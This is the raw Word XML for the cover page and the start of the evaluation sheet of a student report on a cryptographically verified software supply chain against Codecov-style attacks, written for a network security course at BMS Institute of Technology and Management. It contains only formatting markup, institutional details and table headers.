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0CBCC" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BMS INSTITUTE OF TECHNOLOGY AND MANAGEMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183715AC" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Autonomous Institute under VTU, Belagavi, Karnataka - 590 018</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144722AE" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Yelahanka, Bengaluru, Karnataka - 560 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>119</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080A33B9" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69EA5221" wp14:editId="5D5DA363">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>33655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1369060" cy="1415415"/>
            <wp:effectExtent l="0" t="0" r="254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69060" cy="1415415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6EF0C4" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D17374A" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB0F28A" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45557E1C" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD3DA2D" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0965E0AB"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lang w:val="en-US"/>
        </w:rPr>
        <w:t>Information and Network Security (BCS701)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> CCA Report </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2468BE63"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On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615CB3A1" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“Cryptographically Verified Software Supply Chain for Preventing Codecov-Style Supply-Chain Attacks”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C641542" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2AA2B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BACHELOR OF ENGINEERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB2382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in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4221F86E"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INFORMATION SCIENCE AND ENGINEERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4464E3" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="73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3692"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E7149" w:rsidRPr="00F416E0" w14:paraId="3CC9407A" w14:textId="77777777" w:rsidTr="00F416E0">
        <w:trPr>
          <w:trHeight w:val="540"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3692" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56DF1289" w14:textId="77777777"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NAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3692" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46D6E2D8" w14:textId="77777777"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USN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F416E0" w:rsidRPr="00F416E0" w14:paraId="04C23189" w14:textId="77777777" w:rsidTr="00F416E0">
        <w:trPr>
          <w:trHeight w:val="540"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3692" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31CA1842"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31116E53" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRPr="00F416E0" w:rsidRDefault="00F416E0" w:rsidP="00F416E0">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F416E0" w:rsidRPr="00F416E0" w14:paraId="53BB4A36" w14:textId="77777777" w:rsidTr="00F416E0">
        <w:trPr>
          <w:trHeight w:val="540"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3692" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59C8746D"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7A2760D8" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRPr="00F416E0" w:rsidRDefault="00F416E0" w:rsidP="00F416E0">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F416E0" w:rsidRPr="00F416E0" w14:paraId="3CC86133" w14:textId="77777777" w:rsidTr="00F416E0">
        <w:trPr>
          <w:trHeight w:val="540"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3692" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63BE7E13" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRPr="00F416E0" w:rsidRDefault="00F416E0" w:rsidP="00F416E0">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3692" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DF78C26" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRPr="00F416E0" w:rsidRDefault="00F416E0" w:rsidP="00F416E0">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FBB5127" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19AB14FB" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRDefault="00F416E0" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4893FEE2" w14:textId="165A1A2E" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9"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Under the Guidance of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A6105F" w14:textId="2F11B660" w:rsidR="006E7149" w:rsidRPr="006B1CDA" w:rsidRDefault="006B1CDA" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B1CDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Prof. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1CDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sonnegowda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1CDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCEF869" w14:textId="52050FB8" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005A47F1" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Assistant </w:t>
      </w:r>
      <w:r w:rsidR="005E06C9" w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Professor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC78B2F" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E338C61" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="006E7149" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55108CD1" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRDefault="00F416E0" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E8A1504" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRDefault="00F416E0" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C6CFD1E" w14:textId="77777777" w:rsidR="00F416E0" w:rsidRDefault="00F416E0" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A9D13EB" w14:textId="2C376208" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DEPARTMENT OF INFORMATION SCIENCE AND ENGINEERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2711FE6E" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Avalahalli, Yelahanka, Bengaluru, Karnataka -560</w:t>
      </w:r>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>119</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785A968D" w14:textId="77777777" w:rsidR="006E7149" w:rsidRPr="00F416E0" w:rsidRDefault="005E06C9" w:rsidP="00F416E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2025-26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464EA232" w14:textId="536C0777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Evaluation </w:t>
      </w:r>
      <w:r w:rsidR="00F416E0" w:rsidRPr="00F416E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Sheet</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9886" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2131"/>
        <w:gridCol w:w="2268"/>
        <w:gridCol w:w="964"/>
        <w:gridCol w:w="964"/>
        <w:gridCol w:w="964"/>
        <w:gridCol w:w="964"/>
        <w:gridCol w:w="964"/>
        <w:gridCol w:w="667"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E71C43" w:rsidRPr="00F416E0" w14:paraId="425C95C3" w14:textId="77777777" w:rsidTr="00F416E0">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="1983"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2131" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F22183C" w14:textId="67F2777D" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F416E0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00F416E0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A087256" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240"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USN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:textDirection w:val="btLr"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31174474" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="-109" w:right="-108"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F416E0">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Problem Understanding &amp; Requirements </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="964" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:textDirection w:val="btLr"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64A9EFAE" w14:textId="77777777" w:rsidR="00E71C43" w:rsidRPr="00F416E0" w:rsidRDefault="00E71C43" w:rsidP="00E71C43">
            <w:pPr>
